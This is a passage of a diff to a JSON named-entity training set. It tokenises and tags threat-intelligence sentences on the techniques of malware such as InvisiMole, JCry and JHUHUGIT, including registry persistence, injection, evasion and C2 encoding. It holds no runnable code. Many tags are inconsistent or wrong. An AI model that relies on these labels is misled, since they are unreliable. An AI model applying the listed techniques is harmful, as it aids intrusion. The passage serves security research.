+ "use", + "winapiexec", + "tool", + "for", + "indirect", + "execution", + "of", + "<code>ShellExecuteW</code>", + "and", + "<code>CreateProcessA</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "InvisiMole", + "can", + "scan", + "the", + "network", + "for", + "open", + "ports", + "and", + "vulnerable", + "instances", + "of", + "RDP", + "and", + "SMB", + "protocols." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "InvisiMole", + "can", + "disconnect", + "previously", + "connected", + "remote", + "drives." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "can", + "gather", + "network", + "share", + "information." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "has", + "used", + "TCP", + "to", + "download", + "additional", + "modules." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "can", + "use", + "a", + "modified", + "base32", + "encoding", + "to", + "encode", + "data", + "within", + "the", + "subdomain", + "of", + "C2", + "requests." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "avoids", + "analysis", + "by", + "encrypting", + "all", + "strings,", + "internal", + "files,", + "configuration", + "data", + "and", + "by", + "using", + "a", + "custom", + "executable", + "format." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "I-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "can", + "inject", + "its", + "backdoor", + "as", + "a", + "portable", + "executable", + "into", + "a", + "target", + "process." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Way", + "B-Features", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "can", + "obtain", + "a", + "list", + "of", + "running", + "processes." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "can", + "inject", + "itself", + "into", + "another", + "process", + "to", + "avoid", + "detection", + "including", + "use", + "of", + "a", + "technique", + "called", + "ListPlanting", + "that", + "customizes", + "the", + "sorting", + "algorithm", + "in", + "a", + "ListView", + "structure." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "can", + "mimic", + "HTTP", + "protocol", + "with", + "custom", + "HTTP", + "“verbs”", + "HIDE,", + "ZVVP,", + "and", + "NOP." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "InvisiMole", + "can", + "enumerate", + "Registry", + "values,", + "keys,", + "and", + "data." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "can", + "place", + "a", + "lnk", + "file", + "in", + "the", + "Startup", + "Folder", + "to", + "achieve", + "persistence." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "has", + "used", + "rundll32.exe", + "for", + "execution." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "has", + "used", + "scheduled", + "tasks", + "named", + "<code>MSST</code>", + "and", + "<code>\\Microsoft\\Windows\\Autochk\\Scheduled</code>", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "can", + "capture", + "screenshots", + "of", + "not", + "only", + "the", + "entire", + "screen,", + "but", + "of", + "each", + "separate", + "window", + "open,", + "in", + "case", + "they", + "are", + "overlapping." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "can", + "check", + "for", + "the", + "presence", + "of", + "network", + "sniffers,", + "AV,", + "and", + "BitDefender", + "firewall." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "InvisiMole", + "has", + "used", + "Windows", + "services", + "as", + "a", + "way", + "to", + "execute", + "its", + "malicious", + "payload." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "can", + "use", + "a", + ".lnk", + "shortcut", + "for", + "the", + "Control", + "Panel", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "can", + "collect", + "information", + "about", + "installed", + "software", + "used", + "by", + "specific", + "users,", + "software", + "executed", + "on", + "user", + "login,", + "and", + "software", + "executed", + "by", + "each", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "uses", + "variations", + "of", + "a", + "simple", + "XOR", + "encryption", + "routine", + "for", + "C&C", + "communications." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "can", + "check", + "for", + "artifacts", + "of", + "VirtualBox,", + "Virtual", + "PC", + "and", + "VMware", + "environment,", + "and", + "terminate", + "itself", + "if", + "they", + "are", + "detected." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "can", + "gather", + "information", + "on", + "the", + "mapped", + "drives,", + "OS", + "version,", + "computer", + "name,", + "DEP", + "policy,", + "memory", + "size,", + "and", + "system", + "volume", + "serial", + "number." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "gathers", + "information", + "on", + "the", + "IP", + "forwarding", + "table,", + "MAC", + "address,", + "configured", + "proxy,", + "and", + "network", + "SSID." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "lists", + "local", + "users", + "and", + "session", + "information." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "can", + "obtain", + "running", + "services", + "on", + "the", + "victim." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "gathers", + "the", + "local", + "system", + "time", + "from", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "can", + "replace", + "legitimate", + "software", + "or", + "documents", + "in", + "the", + "compromised", + "network", + "with", + "their", + "trojanized", + "versions,", + "in", + "an", + "attempt", + "to", + "propagate", + "itself", + "within", + "the", + "network." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "samples", + "were", + "timestomped", + "by", + "the", + "authors", + "by", + "setting", + "the", + "PE", + "timestamps", + "to", + "all", + "zero", + "values.", + "InvisiMole", + "also", + "has", + "a", + "built-in", + "command", + "to", + "modify", + "file", + "times." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "B-HackOrg", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "can", + "remotely", + "activate", + "the", + "victim’s", + "webcam", + "to", + "capture", + "content." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "uses", + "HTTP", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "can", + "launch", + "a", + "remote", + "shell", + "to", + "execute", + "commands." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "can", + "register", + "a", + "Windows", + "service", + "named", + "CsPower", + "as", + "part", + "of", + "its", + "execution", + "chain,", + "and", + "a", + "Windows", + "service", + "named", + "clr_optimization_v2.0.51527_X86", + "to", + "achieve", + "persistence." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Invoke-PSImage", + "can", + "be", + "used", + "to", + "embed", + "payload", + "data", + "within", + "a", + "new", + "image", + "file." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Invoke-PSImage", + "can", + "be", + "used", + "to", + "embed", + "a", + "PowerShell", + "script", + "within", + "the", + "pixels", + "of", + "a", + "PNG", + "file." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Way", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "IronNetInjector", + "has", + "the", + "ability", + "to", + "decrypt", + "embedded", + ".NET", + "and", + "PE", + "payloads." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "IronNetInjector", + "has", + "the", + "ability", + "to", + "inject", + "a", + "DLL", + "into", + "running", + "processes,", + "including", + "the", + "IronNetInjector", + "DLL", + "into", + "explorer.exe." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SecTeam", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "IronNetInjector", + "can", + "obfuscate", + "variable", + "names,", + "encrypt", + "strings,", + "as", + "well", + "as", + "base64", + "encode", + "and", + "Rijndael", + "encrypt", + "payloads." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Way", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "IronNetInjector", + "has", + "been", + "disguised", + "as", + "a", + "legitimate", + "service", + "using", + "the", + "name", + "PythonUpdateSrvc." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "IronNetInjector", + "can", + "identify", + "processes", + "via", + "C#", + "methods", + "such", + "as", + "<code>GetProcessesByName</code>", + "and", + "running", + "Tasklist", + "with", + "the", + "Python", + "<code>os.popen</code>", + "function." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "IronNetInjector", + "can", + "use", + "an", + "IronPython", + "scripts", + "to", + "load", + "a", + ".NET", + "injector", + "to", + "inject", + "a", + "payload", + "into", + "its", + "own", + "or", + "a", + "remote", + "process." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "IronNetInjector", + "can", + "use", + "IronPython", + "scripts", + "to", + "load", + "payloads", + "with", + "the", + "help", + "of", + "a", + ".NET", + "injector." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-SecTeam" + ] + }, + { + "tokens": [ + "IronNetInjector", + "has", + "used", + "a", + "task", + "XML", + "file", + "named", + "<code>mssch.xml</code>", + "to", + "run", + "an", + "IronPython", + "script", + "when", + "a", + "user", + "logs", + "in", + "or", + "when", + "specific", + "system", + "events", + "are", + "created." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ixeshe", + "can", + "collect", + "data", + "from", + "a", + "local", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ixeshe", + "has", + "a", + "command", + "to", + "delete", + "a", + "file", + "from", + "the", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ixeshe", + "can", + "list", + "file", + "and", + "directory", + "information." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ixeshe", + "sets", + "its", + "own", + "executable", + "file's", + "attributes", + "to", + "hidden." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ixeshe", + "can", + "download", + "and", + "execute", + "additional", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Ixeshe", + "has", + "used", + "registry", + "values", + "and", + "file", + "names", + "associated", + "with", + "Adobe", + "software,", + "such", + "as", + "AcroRd32.exe." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Ixeshe", + "can", + "list", + "running", + "processes." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ixeshe", + "can", + "achieve", + "persistence", + "by", + "adding", + "itself", + "to", + "the", + "<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>", + "Registry", + "key." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ixeshe", + "uses", + "custom", + "Base64", + "encoding", + "schemes", + "to", + "obfuscate", + "command", + "and", + "control", + "traffic", + "in", + "the", + "message", + "body", + "of", + "HTTP", + "requests." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ixeshe", + "collects", + "the", + "computer", + "name", + "of", + "the", + "victim's", + "system", + "during", + "the", + "initial", + "infection." + ], + "ner_tags": [ + "B-Idus", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ixeshe", + "enumerates", + "the", + "IP", + "address,", + "network", + "proxy", + "settings,", + "and", + "domain", + "name", + "from", + "a", + "victim's", + "system." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ixeshe", + "collects", + "the", + "username", + "from", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-Idus", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ixeshe", + "can", + "list", + "running", + "services." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Ixeshe", + "uses", + "HTTP", + "for", + "command", + "and", + "control." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ixeshe", + "is", + "capable", + "of", + "executing", + "commands", + "via", + "cmd." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "JCry", + "has", + "encrypted", + "files", + "and", + "demanded", + "Bitcoin", + "to", + "decrypt", + "those", + "files." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "JCry", + "has", + "been", + "observed", + "deleting", + "shadow", + "copies", + "to", + "ensure", + "that", + "data", + "cannot", + "be", + "restored", + "easily." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "JCry", + "has", + "achieved", + "execution", + "by", + "luring", + "users", + "to", + "click", + "on", + "a", + "file", + "that", + "appeared", + "to", + "be", + "an", + "Adobe", + "Flash", + "Player", + "update", + "installer." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "JCry", + "has", + "used", + "PowerShell", + "to", + "execute", + "payloads." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "JCry", + "has", + "created", + "payloads", + "in", + "the", + "Startup", + "directory", + "to", + "maintain", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "JCry", + "has", + "used", + "VBS", + "scripts." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "JCry", + "has", + "used", + "<code>cmd.exe</code>", + "to", + "launch", + "PowerShell." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "A", + "JHUHUGIT", + "variant", + "accesses", + "a", + "screenshot", + "saved", + "in", + "the", + "clipboard", + "and", + "converts", + "it", + "to", + "a", + "JPG", + "image." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "B-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "JHUHUGIT", + "has", + "used", + "COM", + "hijacking", + "to", + "establish", + "persistence", + "by", + "hijacking", + "a", + "class", + "named", + "MMDeviceEnumerator", + "and", + "also", + "by", + "registering", + "the", + "payload", + "as", + "a", + "Shell", + "Icon", + "Overlay", + "handler", + "COM", + "object", + "({3543619C-D563-43f7-95EA-4DA7E1CC396A})." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Many", + "strings", + "in", + "JHUHUGIT", + "are", + "obfuscated", + "with", + "a", + "XOR", + "algorithm." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "JHUHUGIT", + "has", + "exploited", + "CVE-2015-1701", + "and", + "CVE-2015-2387", + "to", + "escalate", + "privileges." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "JHUHUGIT", + "tests", + "if", + "it", + "can", + "reach", + "its", + "C2", + "server", + "by", + "first", + "attempting", + "a", + "direct", + "connection,", + "and", + "if", + "it", + "fails,", + "obtaining", + "proxy", + "settings", + "and", + "sending", + "the", + "connection", + "through", + "a", + "proxy,", + "and", + "finally", + "injecting", + "code", + "into", + "a", + "running", + "browser", + "if", + "the", + "proxy", + "method", + "fails." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "JHUHUGIT", + "dropper", + "can", + "delete", + "itself", + "from", + "the", + "victim.", + "Another", + "JHUHUGIT", + "variant", + "has", + "the", + "capability", + "to", + "delete", + "specified", + "files." + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "JHUHUGIT", + "can", + "retrieve", + "an", + "additional", + "payload", + "from", + "its", + "C2", + "server.", + "JHUHUGIT", + "has", + "a", + "command", + "to", + "download", + "files", + "to", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "JHUHUGIT", + "has", + "registered", + "a", + "Windows", + "shell", + "script", + "under", + "the", + "Registry", + "key", + "<code>HKCU\\Environment\\UserInitMprLogonScript</code>", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "JHUHUGIT", + "obtains", + "a", + "list", + "of", + "running", + "processes", + "on", + "the", + "victim." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "JHUHUGIT", + "performs", + "code", + "injection", + "injecting", + "its", + "own", + "functions", + "to", + "browser", + "processes." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "JHUHUGIT", + "has", + "used", + "a", + "Registry", + "Run", + "key", + "to", + "establish", + "persistence", + "by", + "executing", + "JavaScript", + "code", + "within", + "the", + "rundll32.exe", + "process." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "JHUHUGIT", + "is", + "executed", + "using", + "rundll32.exe." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "JHUHUGIT", + "has", + "registered", + "itself", + "as", + "a", + "scheduled", + "task", + "to", + "run", + "each", + "time", + "the", + "current", + "user", + "logs", + "in." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "JHUHUGIT", + "variant", + "takes", + "screenshots", + "by", + "simulating", + "the", + "user", + "pressing", + "the", + "\"Take", + "Screenshot\"", + "key", + "(VK_SCREENSHOT),", + "accessing", + "the", + "screenshot", + "saved", + "in", + "the", + "clipboard,", + "and", + "converting", + "it", + "to", + "a", + "JPG", + "image." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "A", + "JHUHUGIT", + "variant", + "encodes", + "C2", + "POST", + "data", + "base64." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "JHUHUGIT", + "obtains", + "a", + "build", + "identifier", + "as", + "well", + "as", + "victim", + "hard", + "drive", + "information", + "from", + "Windows", + "registry", + "key", + "<code>HKLM\\SYSTEM\\CurrentControlSet\\Services\\Disk\\Enum</code>.", + "Another", + "JHUHUGIT", + "variant", + "gathers", + "the", + "victim", + "storage", + "volume", + "serial", + "number", + "and", + "the", + "storage", + "device", + "name." + ], + "ner_tags": [ + "B-Way", + "B-Features", + "B-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "JHUHUGIT", + "variant", + "gathers", + "network", + "interface", + "card", + "information." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "B-Features", + "I-Features", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "JHUHUGIT", + "variants", + "have", + "communicated", + "with", + "C2", + "servers", + "over", + "HTTP", + "and", + "HTTPS." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "JHUHUGIT", + "uses", + "a", + ".bat", + "file", + "to", + "execute", + "a", + ".dll." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "JHUHUGIT", + "has", + "registered", + "itself", + "as", + "a", + "service", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "JPIN", + "variant", + "downloads", + "the", + "backdoor", + "payload", + "via", + "the", + "BITS", + "service." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "JPIN", + "can", + "lower", + "security", + "settings", + "by", + "changing", + "Registry", + "keys." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "JPIN's", + "installer/uninstaller", + "component", + "deletes", + "itself", + "if", + "it", + "encounters", + "a", + "version", + "of", + "Windows", + "earlier", + "than", + "Windows", + "XP", + "or", + "identifies", + "security-related", + "processes", + "running." + ], + "ner_tags": [ + "B-Way", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "JPIN", + "can", + "communicate", + "over", + "FTP." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "JPIN", + "can", + "enumerate", + "drives", + "and", + "their", + "types.", + "It", + "can", + "also", 